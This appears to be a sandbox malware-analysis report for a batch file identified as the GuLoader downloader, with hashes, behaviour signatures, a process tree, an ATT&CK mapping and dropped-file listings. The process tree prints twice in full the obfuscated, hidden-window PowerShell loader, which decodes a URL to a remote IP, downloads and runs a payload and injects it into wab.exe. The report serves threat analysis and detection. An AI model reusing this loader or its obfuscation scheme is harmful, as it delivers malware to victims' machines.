Overview

overview

10

Static

static

1

SMTECHMC U...ne.bat

windows7-x64

8

SMTECHMC U...ne.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-06-2024 18:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SMTECHMC Učitavanje informacija Genvordighederne.bat

  • Size

    6KB

  • MD5

    fa3a7ba5e745930dc4f0200011f6bebf

  • SHA1

    727cf3dc2cae8077736038d9e0d80ed41b8f9981

  • SHA256

    2b1f8cdfc8e9cc3c2cdb2f3c0c65f4266312a1ef90e2ceae5fcf15351625cde3

  • SHA512

    3efafee4781d0b061252d77df025f3a48a9719e306b720df7adb98d241d8b77bf840626af4c0db4cf021800b3d820c1ef4b263015358509ba0b5826b97f37724

  • SSDEEP

    96:Hwt/qMtSV9CPbtmDLDMjSZcOZ81n7+CZYVQh79db3gmJUNJW/irC6V+:f7CPbtmDeSZdZ81nKG0edb39MJW/uV+

Score
10/10
guloaderdownloaderexecution

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SMTECHMC Učitavanje informacija Genvordighederne.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -windowstyle hidden "$Wilfrieds = 1;$Sulkiest='';Function Overcontented($Commentaries){$Crescents=$Commentaries.Length-$Wilfrieds;$Terrorful=$Sulkiest+'Substring';For( $Finskhederne=5;$Finskhederne -lt $Crescents;$Finskhederne+=6){$Dyspathetic+=$Commentaries.$Terrorful.Invoke( $Finskhederne, $Wilfrieds);}$Dyspathetic;}function Arbejdspsykologers($Mournfullest){ . ($Slipstring) ($Mournfullest);}$Hocker=Overcontented ' SignMCyklooBullwzReindi KoralTaktflSnowba Gu l/ G,ne5farm .Feuda0 .tam An to(MiserWMoun,iPolemnFa madHectooTab,kwV lpasJulem AutalN Br tTInspi Bacte1Fari.0An.ep.Tils.0Trstp;afhol venteWuraw i.rblanK,mer6Svane4Atala;,rbej Afli,xBacte6 Micr4Schem;Forhe Isoldrpr unv Azot:C,unt1Raakl2Svovl1.ydaf. Tryk0Samme) ener PhotoGHydroe Fad,c orskDiureo Trv /Corda2Halef0 Prei1Bra.d0Endok0 kond1Lgner0 ecad1,drel WinciFT,opeiRedupr Dar.e Kal.fIcenioAcensxDyrsk/ Sk.l1Quadd2Parce1Snoop. Ager0.chre ';$Udlandene=Overcontented ' Cem.UW rnasTil.eeEnablr Haa,-CawedAF jekgFo haeGivetnPilottTilli ';$Halfcircle=Overcontented 'Sindeh Homot AandtDi,hapKrads:Wiret/Helli/S,lvc1Squil9Thyre4Nappa.unreg5 Hepp9Prope.Anti.3Typ.s1Lejed.Gass.1Fdeva8Frihj7 Fd e/ ecepSLandhafedtemPinsepLy,keaAsphanKnbjneGumlfrMil,esButik.ViliptOilt,oAdviscGenne ';$Splidsedes=Overcontented 'Undta>St,ts ';$Slipstring=Overcontented ' Cathi,ryddeEnkelx Bill ';$Toxosozin='Puissant';$Citrongul = Overcontented 'Schere FlascPantehMynd,oascit Forre%R.spnaKodakpAft.tpFer,yd MyoaaGoitet tri,aEpica% Si,u\ W nvTAnt.ci nonfluninsb Nug,aVe.seg Taske Forhs NdpleSpirin kilodHn,eltBi tae AdolsQ.adr.For,uIGinzonre,endSuper Dr.ft&Cocci& Tilb EftereamyracGr,gahS ismoPa am Cajept Poly ';Arbejdspsykologers (Overcontented ' Wise$Brds,gdrmm lVitrio,elisbudfriaCivillBou.e:GalilEsvarfk FreesEnvaptBdeprr rdstaNondopHelioaAfkolrNytaalTagneeStymim LaanePrehun ac,ot GennaOr.gir,aunei ortosGenerkEgep.=Artfu(UbillcDekadm ProfdSljf Unq.e/FlovscOverd Misad$ giinC .araiGerbotScrapr.aciaoBrystnu,ayugAgurku Ka,yl Pri.)Wa.gt ');Arbejdspsykologers (Overcontented 'Verme$SagkygRrflel Hearo AborbVenskaBarnal Byra: umerCReptioE.ploc P.raaTussle.entarPenc.nBoldneBodybstnker=Forar$ PoseHKatalaCausalSiriofUnexccEla tiMillmr antacUn,erlNidoreEmbat.Cata.sAerugpNa.iolLa.kni ProstKuldk(.sago$SabbaSMacr.pRammelUn.owiOpsigd TostsLactieEatondUndereMistnsBelss)Atom, ');$Halfcircle=$Cocaernes[0];$Oddfellowloges= (Overcontented 'Hal.s$ no agChairlTo,veoUnderb TralaTaleklJiuji:HulskUHermedUndertSe tayF,oggdstandnPrefaiLapiln D.reg TilbeRytminPreen=Brum,N Li,le TruswSub.l-D,bieOPhonobEft.rjBe.obe oelicTripatEtaer GladiSEmul.yHnniks eritHy.roeGigawm Deep.Rd.tjNIn,rreCongrtFldec.indifWFor reSammeb CentC Spe,lMuggsiSvab,eElectnYdelst');$Oddfellowloges+=$Ekstraparlementarisk[1];Arbejdspsykologers ($Oddfellowloges);Arbejdspsykologers (Overcontented 'brodi$ FrokU M ledRenhot S ydyFa ridBlungnMindsiFrihenLa ergSkndseTjen,nRepul.AgterH kavieBir.ha Bayad ouleeCir urB finsChatt[wooli$R.ctoUDist dPhilelG.umba .raknFrifidSubexeM.vesnBogkleStink] Tykm=Indi,$UholdH ivetoCalamcWeekekJenlgeUf.rdr Bran ');$Hatter=Overcontented 'Hippo$ semiUStadsd ,rgetAtom,y ,incdLuteonAngioiAfstvnB,ickgSam.ee Indgn Euk.. SaliDTesseo Dog,wBeraan,edimlSnebooLae.gaAfskydHjemmFStub,iQuaillRiffeewharv(Dis n$ stnHA.oliaOverflLandbfPictocMaungiEditor yldc P,sel ResieSperm,Cav,l$startF FremlVic ri EffinUnexttCl.usbkominsH.numsAfrigeNoebcr UndrnmedhjeRumf.1Afbe 8Atomi6Abild)S,aal ';$Flintbsserne186=$Ekstraparlementarisk[0];Arbejdspsykologers (Overcontented 'Defla$ Sa.mgBist,lPul,aoFan.ib valsaMiddalGalac:De,prtPlnetaUnenslRadiur Un.uiTermig MilieBegejrC.ryse R,ll=Snouc(TopnoTLambae C,insCom,atG,ngl-keatoP re xaPrematReflehAlth Er ve$SkideFRomanl Lan.iVr,stnI.tertDrukkbgoldfs Bu.ss OvereTrad.rLgstrnHjerneBirgi1 Pue 8 Rota6.ayle)t.bat ');while (!$talrigere) {Arbejdspsykologers (Overcontented 'manda$GeneagSt.nil,pihyo Arb bMilehaVenstlMarty: me eL ersko.ntednDildogBindws Ek ah.remkiSkjulpUnhon1.npai8 jol6 eken=Paper$EkspatUldenrFemkauUtidieRatio ') ;Arbejdspsykologers $Hatter;Arbejdspsykologers (Overcontented ' T,emS Sep tUderuaV,jrtrDumpetSpe t- B,faSSerielChampeSankte Kan,pLa,ds Silcr4Dy sp ');Arbejdspsykologers (Overcontented '.ostf$Vove gOmphal MensoCarnibBram.aKn.lllM car:Ha.vatPolitaPronolSynt,r AcetiAalbogfe teeAcculrKomike Cook=Peco.(Ddho THarmwechurcshovedt,ebol-Naia.PTvilla riltthundhLdrei Lamme$ WheeFTinerl AnhuidiakonKbe,ttVe opbTema.sOmrres,aleteHyperr SpagnRigsae .era1Aflbs8 otha6Retic)Snyde ') ;Arbejdspsykologers (Overcontented 'Parad$GrillgFlykklKolero.idigbVandha ClevlAnaly: PorpK LystaOverslSol,oiFilatfOncolf UnpaeEsromrKram,=Wa,ra$Transg.umorlCruddoSangtbGreeiaBlo.sl Expi:HandeABommelPouchmHush,i SukkdDarneaOdi,e+s.ndk+antil% Haar$BaadsCVe eroPulsecDa auaA,zaneFl shrLinagnFalseeAxoplsLan.r.sagescOpposoAn,lyuMussunSnoght Euge ') ;$Halfcircle=$Cocaernes[$Kaliffer];}$Tragedietta=285369;$Handelsgymnasiums=28486;Arbejdspsykologers (Overcontented '.amel$,ulfegpurpulAp,rooTrialbColt a unfrlShoal:Co.meBNedtuiGlamolMagniiVindenM ter Baan=Dmpet EpiteG ,neaeBsesttRel.k-BfsanCUnderoMaskenDi.grtHypereb nehnPerihtBagta Hy,er$JumpiF egnlSamfuibyttenSmaastTr nebMicrosInddrsPre uefirmarTronfn ,orteHagba1Filar8Leuco6Bellu ');Arbejdspsykologers (Overcontented ' delu$A varg NegrlSva moA befb PsykaOber,lUnthr: .uncAT,ntopU uguoRemounUdvi eUn.asuPar,srKnsfooIndehtBricko AdawmErgo eBurki Udvid=gaard Vilje[BlennSRotatySk atsDecartHaande LedemAngst.FiskeCChromo T.ndnZeroiv Berre bordr Tri.topera]Slvtj:,hiti:TetraFmob,lrLivskodyk emTryklBClo daW,bpisPindeeAdene6,rels4 KartS ArmstDecerrRenseiK lminsta,lgDemis(Subdi$Pro eB RelaiPe,tal MisqiEkshinPassa)Sm,gn ');Arbejdspsykologers (Overcontented 'Sphin$Ek.pag,onexlSacraotekstbPelsna Publls,bal:Pr.ncSAstereYtte,a T.arp TachlD,rneaReremnRdspreSnyde ,uske=Fisca Knap[Inv.rSDaubeyScalisTroldtInconesprinmGlas .Ant,cTPotwaeBrsfuxSjlevtproco.LadedEVaaren Ind.c.tenno,vinedSta,fiOccu,nEftergRytmi]Torsk:Culli: BadiAIn.deSproduC semiISt neIBortt.En,enGreheaeForgrt EndoSTiddltUrinrr NowtiSeksunTon mg Ky l( Fran$ DiffAOpfrip ShipoacetonNar.oeUddanu Kaysr Int.oSygemt MagnoL,cofmAnem eagter)Wongs ');Arbejdspsykologers (Overcontented ' B,an$BlendgTizzilvandtoRelatb aperaPondwlRetur:MoronFCrenuoResi.n Mello Ad.ltDipp eTykstkSpilde ForatFasths rneg=femte$RegnsSArbeleZuluda Sgefp Two,lkonsta r.shn Grnse Beko.Mis as AfnauBrillb thoms PenstAzo.orgalniiNussenMand gJuste(Datol$ SiccT awkirStatia NursgMarsheEg rndSvrm.i.imeteChaintArbejtZu.chaUn.al,S att$PistiHTheo,aGar anAgrikdAdkome.quivlSygd.s ennegO.erhyFathomFieuln Drmea M.nos Brevistalku .drem Frucspen,a)Test ');Arbejdspsykologers $Fonotekets;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2236
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tilbagesendtes.Ind && echo t"
          4⤵
            PID:2248
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Wilfrieds = 1;$Sulkiest='';Function Overcontented($Commentaries){$Crescents=$Commentaries.Length-$Wilfrieds;$Terrorful=$Sulkiest+'Substring';For( $Finskhederne=5;$Finskhederne -lt $Crescents;$Finskhederne+=6){$Dyspathetic+=$Commentaries.$Terrorful.Invoke( $Finskhederne, $Wilfrieds);}$Dyspathetic;}function Arbejdspsykologers($Mournfullest){ . ($Slipstring) ($Mournfullest);}$Hocker=Overcontented ' SignMCyklooBullwzReindi KoralTaktflSnowba Gu l/ G,ne5farm .Feuda0 .tam An to(MiserWMoun,iPolemnFa madHectooTab,kwV lpasJulem AutalN Br tTInspi Bacte1Fari.0An.ep.Tils.0Trstp;afhol venteWuraw i.rblanK,mer6Svane4Atala;,rbej Afli,xBacte6 Micr4Schem;Forhe Isoldrpr unv Azot:C,unt1Raakl2Svovl1.ydaf. Tryk0Samme) ener PhotoGHydroe Fad,c orskDiureo Trv /Corda2Halef0 Prei1Bra.d0Endok0 kond1Lgner0 ecad1,drel WinciFT,opeiRedupr Dar.e Kal.fIcenioAcensxDyrsk/ Sk.l1Quadd2Parce1Snoop. Ager0.chre ';$Udlandene=Overcontented ' Cem.UW rnasTil.eeEnablr Haa,-CawedAF jekgFo haeGivetnPilottTilli ';$Halfcircle=Overcontented 'Sindeh Homot AandtDi,hapKrads:Wiret/Helli/S,lvc1Squil9Thyre4Nappa.unreg5 Hepp9Prope.Anti.3Typ.s1Lejed.Gass.1Fdeva8Frihj7 Fd e/ ecepSLandhafedtemPinsepLy,keaAsphanKnbjneGumlfrMil,esButik.ViliptOilt,oAdviscGenne ';$Splidsedes=Overcontented 'Undta>St,ts ';$Slipstring=Overcontented ' Cathi,ryddeEnkelx Bill ';$Toxosozin='Puissant';$Citrongul = Overcontented 'Schere FlascPantehMynd,oascit Forre%R.spnaKodakpAft.tpFer,yd MyoaaGoitet tri,aEpica% Si,u\ W nvTAnt.ci nonfluninsb Nug,aVe.seg Taske Forhs NdpleSpirin kilodHn,eltBi tae AdolsQ.adr.For,uIGinzonre,endSuper Dr.ft&Cocci& Tilb EftereamyracGr,gahS ismoPa am Cajept Poly ';Arbejdspsykologers (Overcontented ' Wise$Brds,gdrmm lVitrio,elisbudfriaCivillBou.e:GalilEsvarfk FreesEnvaptBdeprr rdstaNondopHelioaAfkolrNytaalTagneeStymim LaanePrehun ac,ot GennaOr.gir,aunei ortosGenerkEgep.=Artfu(UbillcDekadm ProfdSljf Unq.e/FlovscOverd Misad$ giinC .araiGerbotScrapr.aciaoBrystnu,ayugAgurku Ka,yl Pri.)Wa.gt ');Arbejdspsykologers (Overcontented 'Verme$SagkygRrflel Hearo AborbVenskaBarnal Byra: umerCReptioE.ploc P.raaTussle.entarPenc.nBoldneBodybstnker=Forar$ PoseHKatalaCausalSiriofUnexccEla tiMillmr antacUn,erlNidoreEmbat.Cata.sAerugpNa.iolLa.kni ProstKuldk(.sago$SabbaSMacr.pRammelUn.owiOpsigd TostsLactieEatondUndereMistnsBelss)Atom, ');$Halfcircle=$Cocaernes[0];$Oddfellowloges= (Overcontented 'Hal.s$ no agChairlTo,veoUnderb TralaTaleklJiuji:HulskUHermedUndertSe tayF,oggdstandnPrefaiLapiln D.reg TilbeRytminPreen=Brum,N Li,le TruswSub.l-D,bieOPhonobEft.rjBe.obe oelicTripatEtaer GladiSEmul.yHnniks eritHy.roeGigawm Deep.Rd.tjNIn,rreCongrtFldec.indifWFor reSammeb CentC Spe,lMuggsiSvab,eElectnYdelst');$Oddfellowloges+=$Ekstraparlementarisk[1];Arbejdspsykologers ($Oddfellowloges);Arbejdspsykologers (Overcontented 'brodi$ FrokU M ledRenhot S ydyFa ridBlungnMindsiFrihenLa ergSkndseTjen,nRepul.AgterH kavieBir.ha Bayad ouleeCir urB finsChatt[wooli$R.ctoUDist dPhilelG.umba .raknFrifidSubexeM.vesnBogkleStink] Tykm=Indi,$UholdH ivetoCalamcWeekekJenlgeUf.rdr Bran ');$Hatter=Overcontented 'Hippo$ semiUStadsd ,rgetAtom,y ,incdLuteonAngioiAfstvnB,ickgSam.ee Indgn Euk.. SaliDTesseo Dog,wBeraan,edimlSnebooLae.gaAfskydHjemmFStub,iQuaillRiffeewharv(Dis n$ stnHA.oliaOverflLandbfPictocMaungiEditor yldc P,sel ResieSperm,Cav,l$startF FremlVic ri EffinUnexttCl.usbkominsH.numsAfrigeNoebcr UndrnmedhjeRumf.1Afbe 8Atomi6Abild)S,aal ';$Flintbsserne186=$Ekstraparlementarisk[0];Arbejdspsykologers (Overcontented 'Defla$ Sa.mgBist,lPul,aoFan.ib valsaMiddalGalac:De,prtPlnetaUnenslRadiur Un.uiTermig MilieBegejrC.ryse R,ll=Snouc(TopnoTLambae C,insCom,atG,ngl-keatoP re xaPrematReflehAlth Er ve$SkideFRomanl Lan.iVr,stnI.tertDrukkbgoldfs Bu.ss OvereTrad.rLgstrnHjerneBirgi1 Pue 8 Rota6.ayle)t.bat ');while (!$talrigere) {Arbejdspsykologers (Overcontented 'manda$GeneagSt.nil,pihyo Arb bMilehaVenstlMarty: me eL ersko.ntednDildogBindws Ek ah.remkiSkjulpUnhon1.npai8 jol6 eken=Paper$EkspatUldenrFemkauUtidieRatio ') ;Arbejdspsykologers $Hatter;Arbejdspsykologers (Overcontented ' T,emS Sep tUderuaV,jrtrDumpetSpe t- B,faSSerielChampeSankte Kan,pLa,ds Silcr4Dy sp ');Arbejdspsykologers (Overcontented '.ostf$Vove gOmphal MensoCarnibBram.aKn.lllM car:Ha.vatPolitaPronolSynt,r AcetiAalbogfe teeAcculrKomike Cook=Peco.(Ddho THarmwechurcshovedt,ebol-Naia.PTvilla riltthundhLdrei Lamme$ WheeFTinerl AnhuidiakonKbe,ttVe opbTema.sOmrres,aleteHyperr SpagnRigsae .era1Aflbs8 otha6Retic)Snyde ') ;Arbejdspsykologers (Overcontented 'Parad$GrillgFlykklKolero.idigbVandha ClevlAnaly: PorpK LystaOverslSol,oiFilatfOncolf UnpaeEsromrKram,=Wa,ra$Transg.umorlCruddoSangtbGreeiaBlo.sl Expi:HandeABommelPouchmHush,i SukkdDarneaOdi,e+s.ndk+antil% Haar$BaadsCVe eroPulsecDa auaA,zaneFl shrLinagnFalseeAxoplsLan.r.sagescOpposoAn,lyuMussunSnoght Euge ') ;$Halfcircle=$Cocaernes[$Kaliffer];}$Tragedietta=285369;$Handelsgymnasiums=28486;Arbejdspsykologers (Overcontented '.amel$,ulfegpurpulAp,rooTrialbColt a unfrlShoal:Co.meBNedtuiGlamolMagniiVindenM ter Baan=Dmpet EpiteG ,neaeBsesttRel.k-BfsanCUnderoMaskenDi.grtHypereb nehnPerihtBagta Hy,er$JumpiF egnlSamfuibyttenSmaastTr nebMicrosInddrsPre uefirmarTronfn ,orteHagba1Filar8Leuco6Bellu ');Arbejdspsykologers (Overcontented ' delu$A varg NegrlSva moA befb PsykaOber,lUnthr: .uncAT,ntopU uguoRemounUdvi eUn.asuPar,srKnsfooIndehtBricko AdawmErgo eBurki Udvid=gaard Vilje[BlennSRotatySk atsDecartHaande LedemAngst.FiskeCChromo T.ndnZeroiv Berre bordr Tri.topera]Slvtj:,hiti:TetraFmob,lrLivskodyk emTryklBClo daW,bpisPindeeAdene6,rels4 KartS ArmstDecerrRenseiK lminsta,lgDemis(Subdi$Pro eB RelaiPe,tal MisqiEkshinPassa)Sm,gn ');Arbejdspsykologers (Overcontented 'Sphin$Ek.pag,onexlSacraotekstbPelsna Publls,bal:Pr.ncSAstereYtte,a T.arp TachlD,rneaReremnRdspreSnyde ,uske=Fisca Knap[Inv.rSDaubeyScalisTroldtInconesprinmGlas .Ant,cTPotwaeBrsfuxSjlevtproco.LadedEVaaren Ind.c.tenno,vinedSta,fiOccu,nEftergRytmi]Torsk:Culli: BadiAIn.deSproduC semiISt neIBortt.En,enGreheaeForgrt EndoSTiddltUrinrr NowtiSeksunTon mg Ky l( Fran$ DiffAOpfrip ShipoacetonNar.oeUddanu Kaysr Int.oSygemt MagnoL,cofmAnem eagter)Wongs ');Arbejdspsykologers (Overcontented ' B,an$BlendgTizzilvandtoRelatb aperaPondwlRetur:MoronFCrenuoResi.n Mello Ad.ltDipp eTykstkSpilde ForatFasths rneg=femte$RegnsSArbeleZuluda Sgefp Two,lkonsta r.shn Grnse Beko.Mis as AfnauBrillb thoms PenstAzo.orgalniiNussenMand gJuste(Datol$ SiccT awkirStatia NursgMarsheEg rndSvrm.i.imeteChaintArbejtZu.chaUn.al,S att$PistiHTheo,aGar anAgrikdAdkome.quivlSygd.s ennegO.erhyFathomFieuln Drmea M.nos Brevistalku .drem Frucspen,a)Test ');Arbejdspsykologers $Fonotekets;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tilbagesendtes.Ind && echo t"
              5⤵
                PID:4900
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:4912
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 216
                  6⤵
                  • Program crash
                  PID:4016
        • C:\Windows\SysWOW64\clip.exe
          "C:\Windows\SysWOW64\clip.exe"
          2⤵
            PID:4424
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4912 -ip 4912
          1⤵
            PID:3988

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Privilege Escalation

          Defense Evasion

          Credential Access

          Discovery

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Resource Development

          Reconnaissance

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_30vrp5dg.vlg.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Tilbagesendtes.Ind
            Filesize

            408KB

            MD5

            0f82af9b5e69e2f84670f4cfb1278d12

            SHA1

            e798c1a70b71af11c02478174ee90b51bcf3ee6c

            SHA256

            044b2b7e61a9c972b5abab7027d31e94bf578ab4d0ba94d3eead70e3cd7ed908

            SHA512

            465a3750b25f8d85483861f7c92c8d6b926870d908ef4fa4a0706ab9dd9335202e67f0bd351d9ea0b838b6c11b1e07d739bd5bd4a96160807032a50c009ffae4

            Download Submit
          • memory/1824-19-0x0000000075310000-0x0000000075AC0000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/1824-18-0x0000000004A00000-0x0000000004A36000-memory.dmp
            Filesize

            216KB

            Download
          • memory/1824-37-0x0000000007800000-0x0000000007E7A000-memory.dmp
            Filesize

            6.5MB

            Download
          • memory/1824-17-0x000000007531E000-0x000000007531F000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1824-38-0x0000000006540000-0x000000000655A000-memory.dmp
            Filesize

            104KB

            Download
          • memory/1824-50-0x0000000075310000-0x0000000075AC0000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/1824-20-0x0000000005070000-0x0000000005698000-memory.dmp
            Filesize

            6.2MB

            Download
          • memory/1824-21-0x0000000075310000-0x0000000075AC0000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/1824-22-0x0000000005020000-0x0000000005042000-memory.dmp
            Filesize

            136KB

            Download
          • memory/1824-23-0x0000000005910000-0x0000000005976000-memory.dmp
            Filesize

            408KB

            Download
          • memory/1824-24-0x0000000005980000-0x00000000059E6000-memory.dmp
            Filesize

            408KB

            Download
          • memory/1824-39-0x0000000007250000-0x00000000072E6000-memory.dmp
            Filesize

            600KB

            Download
          • memory/1824-35-0x0000000005FA0000-0x0000000005FBE000-memory.dmp
            Filesize

            120KB

            Download
          • memory/1824-36-0x0000000005FE0000-0x000000000602C000-memory.dmp
            Filesize

            304KB

            Download
          • memory/1824-48-0x0000000075310000-0x0000000075AC0000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/1824-47-0x000000007531E000-0x000000007531F000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1824-34-0x0000000005AF0000-0x0000000005E44000-memory.dmp
            Filesize

            3.3MB

            Download
          • memory/1824-40-0x00000000071E0000-0x0000000007202000-memory.dmp
            Filesize

            136KB

            Download
          • memory/1824-41-0x0000000008430000-0x00000000089D4000-memory.dmp
            Filesize

            5.6MB

            Download
          • memory/1824-43-0x00000000089E0000-0x000000000D6A2000-memory.dmp
            Filesize

            76.8MB

            Download
          • memory/2236-12-0x0000029535F30000-0x0000029535F52000-memory.dmp
            Filesize

            136KB

            Download
          • memory/2236-44-0x00007FFA18083000-0x00007FFA18085000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2236-45-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2236-13-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2236-14-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2236-2-0x00007FFA18083000-0x00007FFA18085000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2236-53-0x00007FFA18080000-0x00007FFA18B41000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4912-49-0x0000000000E90000-0x0000000005B52000-memory.dmp
            Filesize

            76.8MB

            Download
          • memory/4912-58-0x0000000000E90000-0x0000000005B52000-memory.dmp
            Filesize

            76.8MB

            Download